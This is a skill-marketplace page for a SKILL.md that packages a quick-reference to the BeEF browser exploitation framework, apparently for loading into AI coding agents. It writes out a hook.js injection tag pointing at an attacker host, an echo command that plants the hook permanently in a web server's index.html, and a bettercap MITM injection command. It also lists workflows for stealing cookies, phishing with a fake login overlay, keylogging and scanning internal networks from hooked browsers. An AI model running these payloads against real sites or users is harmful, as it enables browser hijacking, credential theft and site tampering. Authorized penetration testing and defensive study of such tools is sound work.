aeondave/beef
offensive-tools/exploits/beef/SKILL.md
Auth/lab ref: Browser Exploitation Framework - hook browsers via XSS/injected JS and perform client-side testing.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill beefInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Jun 8, 2026, 3:45 AM152.3s2 files scanned
SKILL.md
- name:
- beef
- description:
- Auth/lab ref: Browser Exploitation Framework - hook browsers via XSS/injected JS and perform client-side testing.
- license:
- MIT
- compatibility:
- Ruby; Linux/macOS.
- author:
- AeonDave
- version:
- 1.1
BeEF (Browser Exploitation Framework)
Hook browsers via XSS and execute client-side attacks from a web console.
Quick Start
# Kali
beef-xss
# Or from source
git clone https://github.com/beefproject/beef
cd beef && ./install && ./beef
# Panel: http://127.0.0.1:3000/ui/panel
# Default creds: beef/beef
# Hook URL: http://YOUR_IP:3000/hook.js
Inject Hook
<!-- Inject in XSS payload or MITM response -->
<script src="http://YOUR_IP:3000/hook.js"></script>
Key Module Categories
| Category | Examples | |----------|---------| | Network | Port scanner, ping sweep, SSRF | | Browser | Fingerprint, clipboard steal, camera access | | Social Engineering | Fake login, fake update, clickjacking | | Exploits | Browser CVEs, Java exploits | | Persistence | Persistent hook via service worker | | Misc | Keylogger, screenshot, geolocation |
Common Workflows
Steal cookies via hooked browser:
Modules > Browser > Hooked Domain > Get Cookie
Phishing via fake login overlay:
Modules > Social Engineering > Pretty Theft
Port scan internal network from browser:
Modules > Network > Port Scanner
# Set targets: 192.168.1.1-254
Hook Persistence
// Service Worker persistence (browser-based)
// Modules > Persistence > Create Foreground iFrame
// Modules > Persistence > Man-In-The-Browser
# Embed in page permanently (if you have file write)
echo '<script src="http://YOUR_IP:3000/hook.js"></script>' >> /var/www/html/index.html
Configuration (config.yaml)
beef:
credentials:
user: "beef"
passwd: "changeme" # Change default
http:
host: "0.0.0.0"
port: "3000"
https:
enable: true
port: "3001"
Combine with Other Attacks
# Inject via Responder + MITM (if on LAN)
# Inject via stored XSS
# Inject via MITM with bettercap
bettercap -eval "set http.proxy.injectjs http://YOUR_IP:3000/hook.js; http.proxy on"
Resources
| File | When to load |
|------|--------------|
| references/modules.md | Full module list by category, hook persistence techniques |
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026